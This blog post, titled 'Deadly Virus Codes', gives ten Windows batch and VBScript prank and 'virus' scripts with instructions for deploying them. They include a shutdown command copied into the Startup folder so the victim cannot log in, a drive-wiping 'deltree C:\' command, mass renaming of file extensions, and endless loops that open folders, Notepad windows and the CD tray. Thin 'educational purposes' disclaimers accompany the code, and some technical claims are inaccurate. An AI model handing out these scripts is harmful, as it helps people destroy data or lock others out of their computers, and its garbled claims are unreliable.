Skip to main content

DEADLY VIRUS CODES !


VIRUS AND TROJAN CODES

BY BLOG MASTER MD

HELLO FRIENDS, TODAY I AM GOING TO SHARE SOME VIRUS CODES . I GOT These  pranks FROM VARIOUS RESOURCES ON INTERNET:- 

This Section contains the Virus Codes. Some of these codes are already familiar with you, But still very much harmful and educational too. Below mentioned some of the Platforms in which these virus are coded.
  • BATCH Programming.
  • C/C++
  • Python
  • Visual Basic.
DISCLAIMER :The code here are used for Educational Purposes. Please don’t use them to harm others. You can also install any Virtual Machine on your system, to experiment those codes.
1.  sHuTDoWn  VirUs
Many of you know this trick, but i can’t call this a virus. But still its not a friendly one, it can affect and harm uR data if not saved.
  • Effect –> May Harm uR workings and unsaved data.
  • Coding  Platform –> Batch Programming.
  • Working –> On executing, it will shutdown your system immidiately. If your data is not saved, it can harm uR workings. And can sometimes becomes more destructive for normal users.
Type the code or just paste the code in notepad and save it as “.bat” extension. Example  –>  ron.bat
**************************************************
@echo off
shutdown -s -t “30″
**************************************************
“30″ mentioned here is time in seconds in which your system will shut-down. You can set any time as uR requirements. You can also add comments by adding “-c” tag after “30″. To  give any message to user while shutdown process.
Example  –>  shutdown -s -t “60″ -c “Windows Formatting starts…”
2. sHUtDowN  V!rUs  {mORe DesTrUCt!ve}
This code is same as above but it restricts system to start and shuts down system each time it starts.
  • Effect –>  Destructive and Irritating.
  • Coding platform  –> Batch Programming.
  • Working  –> Shuts down system each time it starts, and user are never able to login properly. If user boots up system again and again, it sometimes cause windows failure or data lost.
Just type or copy the code in notepad and save it as “.bat” extension.
**************************************************
@echo off
shutdown -s -t “00″
**************************************************
Now goto following location  –>  start  –>  all programs  –>  startup. Right Click and open folder. Now just copy that saved .bat file and paste in that startup folder.
CAUTION  –>  DON’T USE THIS ON YOUR SYSTEM, YOU WILL NEVER ABLE TO OPEN YOUR SYSTEM. ONLY WAY TO GET RID OF THIS VIRUS IS TO OPEN YOUR SYSTEM IN SAFE MODE AND JUST GOTO THAT STARTUP FOLDER AND DELETE THAT “.bat” FILE.
3.  MuLt!PLe  FoLDeR  V!RuS
  • Effect –> Not Destructive, But sometimes can become very irritating and itchy.
  • Coding Platform –>  Batch Programming.
  • Working –>  This code will just create multiple folders each time system starts-up and also open those hundreds of folders. It is not destructive but while executing it can eat up uR system process and results in slow system performance and sometimes could hang system.
Just write or copy the code in notepad and save it as “.bat” extension.
**************************************************
@echo off
:RON
md folder1
md folder2
md folder3
md folder4
md folder5
start folder1
start folder2
start folder3
start folder4
start folder5
goto RON
**************************************************
Now goto, START  –>  ALL PROGRAMS  –>  STARTUP FOLDER. Now just copy that .bat file in that folder. Next time system starts, multiple folders are created and will start automatically. You can name folder name anything as you want.
4.  NoTePaD  fLooD
  • Effect –>  Not Destructive or harmless.
  • Coding Platform –>  Batch Programming.
  • Working –>  On executing this .bat file it will open and flood loads of notepad {actually it opens around 180 notepads}. This sometimes cause PC hang.
Type the code or just copy the code in notepad and save it as “.bat” extension.
**************************************************
@echo off
:RON
start notepad
start notepad
start notepad
goto RON
**************************************************
In the above code you can write “start notepad” any number to times. Increasing this command will increase flooding and cause higher chances of system hang-up.
5.  DeaDLy  woRdPaD  V!rUs
  • Effect –>  Deadly and Destructive.
  • Coding Platform –>  Batch Programming.
  • Working –>  On executing, this code will delete every single piece of data from uR hard-drive. It will also wipe out windows from the system.
Just copy the code or type it in a worpad and save it as anyname with “.bat” extension.
**************************************************
@echo off
deltree C:\
**************************************************
NOTE  –  PLEASE DON’T RUN THAT “.bat” FILE ON YOUR SYSTEM. IT CAN BE VERY HARMFUL. AND LEARN THIS CODE FOR EDUCATIONAL PURPOSES ONLY, NOT TO HARM OTHERS.
6. F!le  eXTenS!oN  CorrUPT!nG  V!rUs
  • Effect –>  Effects file execution, irritating but not destructive. Will Corrupt file working.
  • Coding Platform –>  Batch Programming.
  • Working –>  On executing this code will affects the opening of file and will corrupt the files extension. This will corrupt the file and disables it and you will not be able to execute it in proper format.
Just type or copy the code in notepad and save it as anyname with “.bat” extension.
*************************************************
@echo off
ren *.exe *.txt
ren *.jpeg *.txt
ren *.mp3 *.txt
ren *.doc *.com
ren *.jpg *.txt
**************************************************
7.  DanC!nG   CaPsLocK  N  nUmKeY
  • Effect –>  Low, Irritating for normal user.
  • Coding Platform –>  VBscript
  • Working –>  On executing it will toggle both,  capslock and numkey continously and it becomes very irritating for normal user. This type of code can be used for prank purposes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.  Example  –>  ”ron.vbs”
**************************************************
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
loop
**************************************************
8. NoTePaD  TsuNaM!  V!rUs
  • Effect –>  Harmful n Effective, Cause system crash easily.
  • Coding Platform –>  VBscript.
  • Working –>  On Executing, it opens notepad unlimited no. of times and write a text into notepad automatically. It looks very scary for normal users as it leads to system hang and crash system in few minutes.
Just type the code or copy it on notepad and save it as anyname with “.vbs” extension.
**************************************************
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200
Wshshell.Sendkeys “s”
Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”
WScript.Sleep 200
WshShell.SendKeys “You”
WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200
loop
**************************************************
9.  PoP-uP  CD/DvD  Dr!Ve  V!rUs
  • Effect –>  Low, but very irritating. Not Harmless.
  • Coding Platform –>  VBscript.
  • Working –>  On Executing, It will continously pop-up uR CD/DVD. It is very irritating and can be stopped only on system shut-down. It is not harmless or destructive.
Just copy the code or type it on notepad and save it as anyname with “.vbs” extension.
**************************************************
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
************************************************************
10.  ms  word   torjon
  • Effect –>  not harmful and only for fun
  • Coding Platform –>  ms office.
  • Working –>  On Executing, this virus makes ms word to execute a number of statements describing about its content and headings . note that  why this happen, no one knows. 
***************************************************
  syntax :  
                    =rand(no of rows, no of coloumns)
                  =rand(200,46)
**************************************************

DONT FORGET TO PUBLISH YOUR COMMENTS . THANKS !

Comments

Popular posts from this blog

INTERNET ERRORS CODES

MADE BY BLOG MASTER_MD HELLO,FRIENDS..TODAY I AM GOING TO DESCRIBE ABOUT ERROR CODES THAT WE SOMETIMES GET ON INTERNET WHILE USING IT. THIS SEEMS VERY IRRITATING WHEN IT SHOWS QUIT REGULARLY IN  OUR COMPUTER. SO WHAT IS  INTERNET ERROR CODES ??? " The first digit of the status code specifies one of five classes of response; the bare minimum for an HTTP client is that it recognises these five classes. The phrases used are the standard examples, but any human-readable alternative can be provided. Unless otherwise stated, the status code is part of the HTTP/1.1 standard. CLASSES : 1. 1XX-INFORMATIONAL 2. 2XX-SUCESS 3. 3XX-REDIRECTION 4. 4XX-CLIENT ERROR 5. 5XX-SERVER ERROR ERRORS  :             T he 4xx class of status code is intended for cases in which the client seems to have erred. Except when responding to a HEAD request, the server  should  include an entity containing an explanation of the error situation, and whether it is a

TOP 3 FAMOUS HACKERS IN THE WORLD !

BY BLOG MASTER TODAY, I AM GOING TO DISCUSS ABOUT  THE  STARS OF HACKING WORLD . AS, THIS IS MY FIRST BLOG ,SO I AM LITTLE BIT NERVOUS,BUT TRYING TO PUT MY BEST ! HOPE YOU WOULD LIKE... HACKING :     Hacking may refer to: Computer hacking, including the following types of activity: Hacker (programmer subculture), activity within the computer programmer subculture Hacker (computer security), to access computer networks, legally or otherwise Computer crime Phone hacking, the practice of intercepting telephone calls or voicemail messages without the consent of the phone's owner The culture started from the, The hackers culture. Now I am an ethical hacker and many more people like me either interested in or wanted to be hacker, DO you know why is that so? Answer is these guys made term hacking popular worldwide. I know they were bad boys, but as an ethical hacker I salute their intelligence, their dedication, and everything they did. THE FOOLOWING ARE THE L